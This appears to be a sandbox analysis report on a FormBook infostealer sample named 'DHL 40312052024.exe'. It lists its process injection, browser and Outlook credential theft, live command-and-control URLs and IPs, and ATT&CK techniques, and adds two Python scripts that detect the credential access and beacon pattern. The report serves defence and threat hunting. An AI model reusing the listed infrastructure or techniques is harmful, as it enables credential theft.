Source: DHL 40312052024.exe | Binary or memory string: WIN_81
Source: DHL 40312052024.exe | Binary or memory string: WIN_XP
Source: DHL 40312052024.exe | Binary or memory string: WIN_XPe
Source: DHL 40312052024.exe | Binary or memory string: WIN_VISTA
Source: DHL 40312052024.exe | Binary or memory string: WIN_7
Source: DHL 40312052024.exe | Binary or memory string: WIN_8
Source: DHL 40312052024.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
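The file and registry accesses listed above are the host-side fingerprint of this sample's credential theft: a process that is neither Chrome, Edge nor Outlook opens the Chrome and Edge "Login Data", "Web Data", "Cookies" and "Local State" files and the Outlook profile key in quick succession. The following detection check is an added example written for this page, not Joe Sandbox code; it turns the paths from the report into match rules and runs them over constructed access events (the event shape, the PIDs and the owner-process allowlist are assumptions, the target paths are the report's own).

```python
import re
from collections import defaultdict

# Credential stores the report shows netbtugc.exe opening, turned into match rules.
# Each rule: (regex over the file path or registry key, store label, image names
# that legitimately own that store and are therefore not alerted on).
STORE_RULES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(?:Network\\)?Cookies$", re.I),
     "chrome_cookies", {"chrome.exe"}),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\(?:Login Data|Web Data)$", re.I),
     "chrome_logins", {"chrome.exe"}),
    (re.compile(r"\\Google\\Chrome\\User Data\\(?:[^\\]+\\)?(?:Network\\)?Local State$", re.I),
     "chrome_local_state", {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\[^\\]+\\(?:Login Data|Web Data|(?:Network\\)?Cookies)$", re.I),
     "edge_store", {"msedge.exe"}),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I),
     "outlook_profiles", {"outlook.exe"}),
]

# Constructed access events in the shape EDR/Sysmon-style telemetry provides.
# Targets mirror the report's "File opened"/"Key opened" lines; PIDs are made up.
NETBT = r"C:\Windows\SysWOW64\netbtugc.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
LOCAL = r"C:\Users\user\AppData\Local"
SAMPLE_EVENTS = [
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Google\Chrome\User Data\Default\Cookies"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Google\Chrome\User Data\Default\Network\Cookies"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Google\Chrome\User Data\Default\Web Data"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Microsoft\Edge\User Data\Default\Login Data"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Google\Chrome\User Data\Default\Local State"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Google\Chrome\User Data\Default\Network\Local State"},
    {"pid": 5120, "image": NETBT, "target": LOCAL + r"\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"pid": 5120, "image": NETBT, "target": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
                                            "\\Windows Messaging Subsystem\\Profiles\\Outlook\\"},
    # Benign traffic: the browser reading its own profile, and an unrelated file open.
    {"pid": 3344, "image": CHROME, "target": LOCAL + r"\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 4010, "image": r"C:\Windows\explorer.exe", "target": r"C:\Users\user\Desktop\DHL 40312052024.exe"},
]


def classify(image, target):
    """Return (store label, owned) for a credential-store access, or None for anything else.
    owned is True when the accessing image is the store's legitimate owner."""
    exe = image.rsplit("\\", 1)[-1].lower()
    for rx, store, owners in STORE_RULES:
        if rx.search(target):
            return store, exe in owners
    return None


def find_harvesters(events, min_stores=2):
    """Per process, collect the credential stores it opened without being their owner and
    return those that touched at least min_stores distinct stores. One foreign process
    walking Chrome, Edge and the Outlook profile key in a row is what the report records."""
    touched = defaultdict(set)
    for ev in events:
        hit = classify(ev["image"], ev["target"])
        if hit and not hit[1]:
            touched[(ev["pid"], ev["image"])].add(hit[0])
    return {proc: sorted(stores) for proc, stores in touched.items() if len(stores) >= min_stores}


if __name__ == "__main__":
    for (pid, image), stores in find_harvesters(SAMPLE_EVENTS).items():
        print(f"ALERT pid={pid} {image} opened {len(stores)} credential stores: {', '.join(stores)}")
```

The allowlist is deliberately keyed on the image name only; in production you would pair it with a signer or path check, because a stealer running from a copied or injected process (here a file in SysWOW64) can carry any name it likes. The min_stores threshold of 2 keeps single-file reads by backup or sync tools out of the alert.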

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_00826283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00826283
Source: C:\Users\user\Desktop\DHL 40312052024.exe | Code function: 0_2_00826747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00826747
MITRE ATT&CK matrix. Techniques that carry a signature-count badge in the report, grouped by tactic; badge values are reproduced as printed, and the matrix's remaining cells carried no badge.

Reconnaissance: no badged technique
Resource Development: no badged technique
Initial Access: Valid Accounts (2)
Execution: Native API (2)
Persistence: DLL Side-Loading (1), Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (2), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
Credential Access: OS Credential Dumping (1), Input Capture (21)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (151), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
Lateral Movement: no badged technique
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4)
Exfiltration: no badged technique
Impact: System Shutdown/Reboot (1)
Behavior Graph (ID: 1570503, Sample: DHL 40312052024.exe, Startdate: 07/12/2024, Architecture: WINDOWS, Score: 100), rendered as a process tree:

Start node: contacts www.joyesi.xyz, www.techchains.info and 15 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures. Performs DNS queries to domains with low reputation (www.joyesi.xyz).
  DHL 40312052024.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    svchost.exe (started): Maps a DLL or memory area into another process
      oYzsgiLOOTqCTABCCGZlOCaAgG.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
        netbtugc.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          oYzsgiLOOTqCTABCCGZlOCaAgG.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Network: www.rssnewscast.com 91.195.240.94 (client ports 49984, 49985, 49986; SEDO-ASDE, Germany); elettrosistemista.zip 195.110.124.133 (client ports 49992, 49993, 49994; REGISTER-ASIT, Italy); 5 other IPs or domains
          firefox.exe (started)

Antivirus and machine-learning verdicts for the sample (source | detection | scanner | label):
DHL 40312052024.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject
DHL 40312052024.exe | 42% | Virustotal
DHL 40312052024.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Antivirus verdicts for URLs (source | detection | scanner | label):
http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB | 100% | Avira URL Cloud | malware
http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB | 100% | Avira URL Cloud | malware
https://www.empowermedeco.com/fo8o/?k0=mxnR | 0% | Avira URL Cloud | safe
http://www.magmadokum.com/fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB | 0% | Avira URL Cloud | safe
http://www.3xfootball.com/fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB | 0% | Avira URL Cloud | safe
http://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB | 0% | Avira URL Cloud | safe
http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB | 100% | Avira URL Cloud | malware
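The URL verdicts above split three ways (malware, safe, and nothing for the bare path) even though every request has the same shape: one short directory under the root (/fo8o/), a long k0= value and an identical hh= value (cJ5D4t7Hz6GD3fB) sent to six unrelated domains. That rotation across a list of mostly decoy domains is how FormBook beacons, so the reliable signal is the shared structure per client rather than the reputation of any single host. The hunting check below is an added example written for this page, not Joe Sandbox code: it keys on the URL shape instead of the parameter names (k0/hh are specific to this build), and runs over constructed proxy-log lines built from the report's own URLs. The log format, the client addresses, the length thresholds and the domain-count threshold are assumptions.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed proxy-log lines, "<client-ip> <url>". The six long URLs are the ones the
# report lists; the two short ones are ordinary browser traffic added for contrast, and
# the last line is a second client that hit only one of the domains.
FORMBOOK_URLS = [
    "http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB",
    "http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB",
    "http://www.magmadokum.com/fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB",
    "http://www.3xfootball.com/fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB",
    "http://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB",
    "http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB",
]
SAMPLE_LOG = ["10.0.0.5 " + u for u in FORMBOOK_URLS] + [
    "10.0.0.5 https://duckduckgo.com/ac/?q=test",
    "10.0.0.5 https://www.ecosia.org/newtab/",
    "10.0.0.9 " + FORMBOOK_URLS[-1],
]


def request_key(url):
    """Reduce a request to (path, id-param name, id value) when it has the shape seen in the
    report: one short alphanumeric directory under the root and exactly two query
    parameters, one long (the encrypted payload, k0= here) and one short (the bot/campaign
    id, hh= here). Parameter names differ between builds, so the check keys on shape."""
    u = urlsplit(url)
    segs = [s for s in u.path.split("/") if s]
    if len(segs) != 1 or not (3 <= len(segs[0]) <= 8) or not segs[0].isalnum():
        return None
    q = parse_qs(u.query, keep_blank_values=True)
    if len(q) != 2:
        return None
    short, long_ = sorted(q, key=lambda n: len(q[n][0]))
    if len(q[short][0]) > 32 or len(q[long_][0]) < 64:
        return None
    return u.path, short, q[short][0]


def find_beacon_clusters(log_lines, min_domains=3):
    """Group requests per client by (path, id param, id value) and return the clusters that
    span at least min_domains distinct hosts: the same path and id re-sent to a list of
    unrelated domains is the rotation over a decoy list that the report's URL set shows."""
    groups = defaultdict(set)
    for line in log_lines:
        client, url = line.split(" ", 1)
        key = request_key(url)
        if key:
            groups[(client,) + key].add(urlsplit(url).hostname)
    return {k: sorted(hosts) for k, hosts in groups.items() if len(hosts) >= min_domains}


if __name__ == "__main__":
    for (client, path, param, ident), hosts in find_beacon_clusters(SAMPLE_LOG).items():
        print(f"{client}: {path} {param}={ident} sent to {len(hosts)} domains: {', '.join(hosts)}")
```

The truncated memory string https://www.empowermedeco.com/fo8o/?k0=mxnR is deliberately rejected (only one parameter), as are search-engine requests with a short path segment or no query. Run over real proxy data the check should be windowed (the same client, say, within a few minutes) so that a legitimately shared path like /api/ across CDNs does not accumulate into a cluster over days.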
Domains (name | IP | active | malicious | reputation; no antivirus detection was recorded for any domain):
elettrosistemista.zip | 195.110.124.133 | true | false | high
empowermedeco.com | 217.196.55.202 | true | false | high
www.3xfootball.com | 154.215.72.110 | true | false | high
www.goldenjade-travel.com | 116.50.37.244 | true | false | high
www.rssnewscast.com | 91.195.240.94 | true | false | high
www.techchains.info | 66.29.149.46 | true | false | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | high
www.magmadokum.com | unknown | unknown | false | high
www.donnavariedades.com | unknown | unknown | false | high
www.660danm.top | unknown | unknown | false | high
www.joyesi.xyz | unknown | unknown | false | high
www.liangyuen528.com | unknown | unknown | false | high
www.kasegitai.tokyo | unknown | unknown | false | high
www.empowermedeco.com | unknown | unknown | false | high
www.elettrosistemista.zip | unknown | unknown | false | high
www.antonio-vivaldi.mobi | unknown | unknown | false | high
URLs (name | malicious | antivirus detection | reputation):
http://www.empowermedeco.com/fo8o/ | false | no AV detection | high
http://www.elettrosistemista.zip/fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/?k0=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&hh=cJ5D4t7Hz6GD3fB | true | Avira URL Cloud: malware | unknown
http://www.elettrosistemista.zip/fo8o/ | false | no AV detection | high
http://www.magmadokum.com/fo8o/ | false | no AV detection | high
http://www.rssnewscast.com/fo8o/ | false | no AV detection | high
http://www.3xfootball.com/fo8o/?k0=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&hh=cJ5D4t7Hz6GD3fB | true | Avira URL Cloud: safe | unknown
http://www.magmadokum.com/fo8o/?k0=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&hh=cJ5D4t7Hz6GD3fB | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/?k0=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&hh=cJ5D4t7Hz6GD3fB | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/?k0=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&hh=cJ5D4t7Hz6GD3fB | true | Avira URL Cloud: safe | unknown
http://www.goldenjade-travel.com/fo8o/ | false | no AV detection | high
http://www.techchains.info/fo8o/ | false | no AV detection | high
URLs found in memory (name | source | malicious | antivirus detection | reputation):
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://www.empowermedeco.com/fo8o/?k0=mxnR | netbtugc.exe, 00000004.00000002.4474120065.000000000496A000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003F6A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.empowermedeco.com | oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4475242478.0000000004ECC000.00000040.80000000.00040000.00000000.sdmp | false | no AV detection | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.4474120065.0000000003FFE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4475817977.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmp | false | no AV detection | high
https://www.sedo.com/services/parking.php3 | oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.00000000035FE000.00000004.00000001.00040000.00000000.sdmp | false | no AV detection | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmp | false | no AV detection | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.4474120065.0000000004322000.00000004.10000000.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473658258.0000000003922000.00000004.00000001.00040000.00000000.sdmp | false | no AV detection | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmp | false | no AV detection | high
IPs (IP | domain | country | ASN | ASN name | malicious):
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1570503
Start date and time: 2024-12-07 06:59:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL 40312052024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@15/7
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 50
• Number of non-executed functions: 272
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target oYzsgiLOOTqCTABCCGZlOCaAgG.exe, PID 1852 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  Time | Type | Description
                                                                                  01:00:51 | API Interceptor | 9424311x Sleep call for process: netbtugc.exe modified
                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                  91.195.240.94 | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 64411-18.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 11-17.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  91.195.240.94 | Certificate 11-142024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  154.215.72.110 | wOoESPII08.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                  154.215.72.110 | N2sgk6jMa2.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                  154.215.72.110 | Document 151-512024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                  www.3xfootball.com | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | CCE 30411252024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 20156-2024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  www.3xfootball.com | RvJVMsNLJI.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK | DHL 30312052024.exe | Get hash | malicious | FormBook | Browse
                                                                                  • 154.215.72.110
